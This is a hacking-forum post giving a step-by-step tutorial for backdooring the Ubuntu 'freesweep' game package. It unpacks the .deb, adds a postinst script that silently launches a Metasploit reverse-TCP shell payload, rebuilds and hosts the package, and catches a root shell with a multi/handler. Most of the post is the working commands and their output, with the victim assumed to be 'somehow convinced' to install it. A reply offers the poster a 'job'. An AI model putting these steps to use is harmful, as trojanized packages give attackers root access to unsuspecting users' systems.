iExploit

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Apply for Membership

Top Posters

Who's Online (0)

Powered by Vanilla. Made with Bootstrap.
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
Binary Linux Trojans
  • The-Force
    Posts: 15
    In order to demonstrate that client side attacks and trojans are not exclusive to the Windows world, we will package a Metasploit payload in with an Ubuntu deb package to give us a shell on Linux.
    An excellent video was made by Redmeat_uk demonstrating this technique that you can view at:

    http://securitytube.net/Ubuntu-Package-Backdoor-using-a-Metasploit-Payload-video.aspx


    We first need to download the package that we are going to infect and move it to a temporary working directory. In our example, we will use the package 'freesweep', a text-based version of Mine Sweeper.

    root@bt4:/pentest/exploits/framework3# apt-get --download-only install freesweep
    Reading package lists... Done
    Building dependency tree
    Reading state information... Done
    ...snip...
    root@bt4:/pentest/exploits/framework3# mkdir /tmp/evil
    root@bt4:/pentest/exploits/framework3# mv /var/cache/apt/archives/freesweep_0.90-1_i386.deb /tmp/evil
    root@bt4:/pentest/exploits/framework3# cd /tmp/evil/
    root@bt4:/tmp/evil#


    Next, we need to extract the package to a working directory and create a DEBIAN directory to hold our additional added "features".

    root@v-bt4-pre:/tmp/evil# dpkg -x freesweep_0.90-1_i386.deb work
    root@v-bt4-pre:/tmp/evil# mkdir work/DEBIAN


    In the 'DEBIAN' directory, create a file named 'control' that contains the following:

    root@bt4:/tmp/evil/work/DEBIAN# cat control
    Package: freesweep
    Version: 0.90-1
    Section: Games and Amusement
    Priority: optional
    Architecture: i386
    Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
    Description: a text-based minesweeper
    Freesweep is an implementation of the popular minesweeper game, where
    one tries to find all the mines without igniting any, based on hints given
    by the computer. Unlike most implementations of this game, Freesweep
    works in any visual text display - in Linux console, in an xterm, and in
    most text-based terminals currently in use.


    We also need to create a post-installation script that will execute our binary. In our 'DEBIAN', we'll create a file named 'postinst' that contains the following:

    root@bt4:/tmp/evil/work/DEBIAN# cat postinst
    #!/bin/sh

    sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &


    Now we'll create our malicious payload. We'll be creating a reverse shell to connect back to us named 'freesweep_scores'.

    root@bt4:/pentest/exploits/framework3# ./msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.1.101 LPORT=443 X > /tmp/evil/work/usr/games/freesweep_scores
    Created by msfpayload (http://www.metasploit.com).
    Payload: linux/x86/shell/reverse_tcp
    Length: 50
    Options: LHOST=192.168.1.101,LPORT=443


    We'll now make our post-installation script executable and build our new package. The built file will be named 'work.deb' so we will want to change that to 'freesweep.deb' and copy the package to our web root directory.

    root@bt4:/tmp/evil/work/DEBIAN# chmod 755 postinst
    root@bt4:/tmp/evil/work/DEBIAN# dpkg-deb --build /tmp/evil/work
    dpkg-deb: building package `freesweep' in `/tmp/evil/work.deb'.
    root@bt4:/tmp/evil# mv work.deb freesweep.deb
    root@bt4:/tmp/evil# cp freesweep.deb /var/www/


    If it is not already running, we'll need to start the Apache web server.

    root@bt4:/tmp/evil# /etc/init.d/apache2 start


    We will need to set up the Metasploit multi/handler to receive the incoming connection.

    root@bt4:/pentest/exploits/framework3# ./msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=192.168.1.101 LPORT=443 E
    [*] Please wait while we load the module tree...
    [*] Handler binding to LHOST 0.0.0.0
    [*] Started reverse handler
    [*] Starting the payload handler...


    On our Ubuntu victim, we have somehow convinced the user to download and install our awesome new game.

    ubuntu@ubuntu:~$ wget http://192.168.1.101/freesweep.deb
    ubuntu@ubuntu:~$ sudo dpkg -i freesweep.deb



    As the victim installs and plays our game, we have received a shell

    [*] Sending stage (36 bytes)
    [*] Command shell session 1 opened (192.168.1.101:443 -> 192.168.1.175:1129)

    ifconfig
    eth1 Link encap:Ethernet HWaddr 00:0C:29:C2:E7:E6
    inet addr:192.168.1.175 Bcast:192.168.1.255 Mask:255.255.255.0
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:49 errors:0 dropped:0 overruns:0 frame:0
    TX packets:51 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:43230 (42.2 KiB) TX bytes:4603 (4.4 KiB)
    Interrupt:17 Base address:0x1400
    ...snip...

    hostname
    ubuntu
    id
    uid=0(root) gid=0(root) groups=0(root)


    cheers...
  • Xin
    Posts: 3,251
    Great tutorial again force, i need your msn so we can sort out a job for you :)
    Xin
Add a Comment